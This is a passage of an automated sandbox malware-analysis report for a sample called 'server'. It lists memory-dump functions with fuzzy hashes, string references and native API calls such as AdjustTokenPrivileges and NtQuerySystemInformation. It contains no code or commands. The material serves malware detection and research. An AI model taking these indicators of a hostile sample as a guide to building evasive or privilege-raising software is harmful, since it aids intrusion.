Instruction ID: 58cebf477421af50726ae9f7e90753ced853627593f178f33953f2e414887d0e
Opcode Fuzzy Hash: 25a4236052f2daf0888960ec347d8e4c03c2f96649f075131073fec57ca63041
Instruction Fuzzy Hash: 08D21675A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E84CF51

Function 02FD4FF8 Relevance: 6.2, Strings: 4, Instructions: 1230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@%l, xrefs: 02FD5539
2Ll, xrefs: 02FD5415
\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$:@%l$\OLl$2Ll
API String ID: 0-3794265009
Opcode ID: 9d73927dd6441f5b1bf8f6b3703dc6506f1e4ee3b7f3dc4f78c31f03aebbd7e1
Instruction ID: eecbe5c18fb5cb9a8c27cf714e40a8093bcc273ec2dc44180e358bfb3f8391dd
Opcode Fuzzy Hash: 9d73927dd6441f5b1bf8f6b3703dc6506f1e4ee3b7f3dc4f78c31f03aebbd7e1
Instruction Fuzzy Hash: 96D21675A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E84CF51

Function 02FD5055 Relevance: 6.2, Strings: 4, Instructions: 1225
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@%l, xrefs: 02FD5539
2Ll, xrefs: 02FD5415
\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$:@%l$\OLl$2Ll
API String ID: 0-3794265009
Opcode ID: 083bf3bccc36435a38bf5b2d720d38f63722c1c15522aab327ed878a7f1219b2
Instruction ID: 1896361b65e3b84e7b6f1dc660c8260080d4677907466b372948519542d479f5
Opcode Fuzzy Hash: 083bf3bccc36435a38bf5b2d720d38f63722c1c15522aab327ed878a7f1219b2
Instruction Fuzzy Hash: B0D21675A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E84CF51

Function 02FD50DB Relevance: 6.2, Strings: 4, Instructions: 1210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@%l, xrefs: 02FD5539
2Ll, xrefs: 02FD5415
\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$:@%l$\OLl$2Ll
API String ID: 0-3794265009
Opcode ID: 223ea39f47f570d02fe6b578e077f82ccc1157d8e2819af2fb134e62ee1d2df9
Instruction ID: 5ce3ac11f5627d3bb402da2a5700014e63b645c542c4ede419610f1eb4d73093
Opcode Fuzzy Hash: 223ea39f47f570d02fe6b578e077f82ccc1157d8e2819af2fb134e62ee1d2df9
Instruction Fuzzy Hash: 69D21575A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E84CF51

Function 02FD5367 Relevance: 6.1, Strings: 4, Instructions: 1071
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@%l, xrefs: 02FD5539
2Ll, xrefs: 02FD5415
\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$:@%l$\OLl$2Ll
API String ID: 0-3794265009
Opcode ID: 484add42cf001977f87d032512da402fea9ff6ae5a2bfbeb9e44eab7e66149ee
Instruction ID: 285ac6ca0a1eade920f1e44ca1ae04f5c66957057dd58e9ad85618986ea6921b
Opcode Fuzzy Hash: 484add42cf001977f87d032512da402fea9ff6ae5a2bfbeb9e44eab7e66149ee
Instruction Fuzzy Hash: D2C20474A412288FDB25DF20D864BADB7B6FB49308F1041EAD909A77A0CF359E85CF51

Function 02FD5451 Relevance: 4.8, Strings: 3, Instructions: 1040
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:@%l, xrefs: 02FD5539
\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$:@%l$\OLl
API String ID: 0-798552604
Opcode ID: 5e114f83e818f4adb0564ac604891e4bcd40eaab81733bdf18fd2dddb6f36207
Instruction ID: 39ddc5ca24d487e2b0018b53dadc67840d34bf49d2c3ba5c4ddfa68ec4824d8c
Opcode Fuzzy Hash: 5e114f83e818f4adb0564ac604891e4bcd40eaab81733bdf18fd2dddb6f36207
Instruction Fuzzy Hash: 25C20574A412288FDB25DF20D864BADB7B6FB49308F1041EAD909A77A0CF359E85CF51

Function 00B37208 Relevance: 2.7, Strings: 2, Instructions: 184COMMON

Download Yara Rule

Strings

Software\Borland\Locales, xrefs: 00B37238, 00B37256
Software\Borland\Delphi\Locales, xrefs: 00B37274

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID:
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 0-2375825460
Opcode ID: 97b234343d6e153c8eb52836f92f753bca942229ef1f297fb5add1052643b284
Instruction ID: eddc7a92c2415ef4aa09a8c5971df3d1c886c0a05183bb4efec88bbdab9b6a1f
Opcode Fuzzy Hash: 97b234343d6e153c8eb52836f92f753bca942229ef1f297fb5add1052643b284
Instruction Fuzzy Hash: 695157B5A4465C7AEB35D6A49C47FEF7BECDB04740F6001E1BA04E6181DB74AE44CBA0

Function 00D9BC4F Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00D9BCCF

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: be6a110abac89824d81106b4f7bb7969c0a6d04aef3d242399bc5405c73eda81
Instruction ID: b9e17e9ed9f8571db8e0dd31a18056c935473f59dfe0756e91300890434bf20d
Opcode Fuzzy Hash: be6a110abac89824d81106b4f7bb7969c0a6d04aef3d242399bc5405c73eda81
Instruction Fuzzy Hash: C621D175509380AFEB128F25DC44B52BFB4EF06320F0D84DAE9858F163D3719908DB61

Function 00D9BE8B Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 00D9BF01

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 51842297e1539f65884f2ed6bf20275602198e213e6343f1f637f42eb134f9b4
Instruction ID: 53ffd8bbac1e3ad8c5a93283aa28af4020b82d6d2b7ed39b57a10ed87175f09f
Opcode Fuzzy Hash: 51842297e1539f65884f2ed6bf20275602198e213e6343f1f637f42eb134f9b4
Instruction Fuzzy Hash: CF21AE754097C0AFDB238F20DC45A52FFB4EF16324F0D84CBE9848B5A3D265A909DB62

Function 00A19A34 Relevance: 1.6, APIs: 1, Instructions: 52filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00A19A8C

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 72f16cc73f8e05ff297cc1c02629eb88483d54904c94eb1b2eb0384d0f4aded7
Instruction ID: b0ee83016ee64d0162bdd21f3533a5349e73fc3576650aa683c08825f2820151
Opcode Fuzzy Hash: 72f16cc73f8e05ff297cc1c02629eb88483d54904c94eb1b2eb0384d0f4aded7
Instruction Fuzzy Hash: 62014AB6200259BFDB10DE8ADCC4DEBBBACFB8D694B444105BB1897202C230AD51CB70

Function 00D9BC86 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00D9BCCF

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 5ab2ec61cd5de0dfc41f049f0c50115935dd23f333acad5dd31ecd8dde4c1e0e
Instruction ID: d0b4a42ca3a67f38c6f5b9bbf46d41868e3edc435b115713e3a5a04841a2e1f1
Opcode Fuzzy Hash: 5ab2ec61cd5de0dfc41f049f0c50115935dd23f333acad5dd31ecd8dde4c1e0e
Instruction Fuzzy Hash: D11191355002009FDF21CF55D984B66FBE4EF04320F08C86ADD4A8B621D731E418DB71

Function 00A199DC Relevance: 1.5, APIs: 1, Instructions: 44filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00A19A24

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: e1194cba89d96a9adaad6b31ab54561abdd7c4b2885d6cb8ed652d7c14b3e6b9
Instruction ID: ef50d61213d687e778140d2dd7e3fe86d70cd90fb7b4ed3d33d25a55938b21e6
Opcode Fuzzy Hash: e1194cba89d96a9adaad6b31ab54561abdd7c4b2885d6cb8ed652d7c14b3e6b9
Instruction Fuzzy Hash: 9EF091B6100249BF9710DE86DCC4DE77B6CEB8D7A1B444105F71897101C230AD51C770

Function 00D9BEC6 Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 00D9BF01

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 70ba3cb29305a728eeb31aa2a5e8c5840b2c380f6ee8ca77a007dbabda48eb74
Instruction ID: 6c6411aafcd694a711a99ed63a97b3bd4ce02241ef80425cbeaacbcc94fae268
Opcode Fuzzy Hash: 70ba3cb29305a728eeb31aa2a5e8c5840b2c380f6ee8ca77a007dbabda48eb74
Instruction Fuzzy Hash: C1018F364006409FDF218F15ED85B61FBA0EF04724F08C49AED894B662D376E418DF72

Function 00A19974 Relevance: 1.5, APIs: 1, Instructions: 26filenativeCOMMON

Download Yara Rule

APIs

NtSetInformationFile.NTDLL(?,?,?,?,?), ref: 00A1999B

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: FileInformation
String ID:
API String ID: 4253254148-0
Opcode ID: aed5271f86a1d247009eeca274fa38cc96bac1d708ae4ce7e621e3d944de5634
Instruction ID: 20c930b24f325d56f597a679064fbeaa3e3f385a1786a3f5cefe3ecaa26c3440
Opcode Fuzzy Hash: aed5271f86a1d247009eeca274fa38cc96bac1d708ae4ce7e621e3d944de5634
Instruction Fuzzy Hash: 38E0ECA1604258BEE73497DAAC0DDF77F6DDBC6BF1B04411DB60892110C261AC81C2B4

Function 00A19958 Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL ref: 00A1996B

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 8f92a67900656fdd3f0c7e76949a394eb8a988f9a078c41a1d1ea6d300cbff75
Instruction ID: 4c1ea410ed36b56c85399358ee09be85c8db5de6038d75248b4e3cfbcdff5374
Opcode Fuzzy Hash: 8f92a67900656fdd3f0c7e76949a394eb8a988f9a078c41a1d1ea6d300cbff75
Instruction Fuzzy Hash: 8EB012D0902148FADF02D7FC5C0D7B7694C5B82303F04829CB315F11B4CB284541E728

Function 00A1996A Relevance: 1.5, APIs: 1, Instructions: 3nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL ref: 00A1996B

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a2294106ef934395d0e69d0ed070ad56b347653f635cdc4f58b54072da5dd0a9
Instruction ID: 36cbff09100bcc84b42530c55d1537d16331d24b75f9d35035549740422cbdee
Opcode Fuzzy Hash: a2294106ef934395d0e69d0ed070ad56b347653f635cdc4f58b54072da5dd0a9
Instruction Fuzzy Hash:

Function 00A1820C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

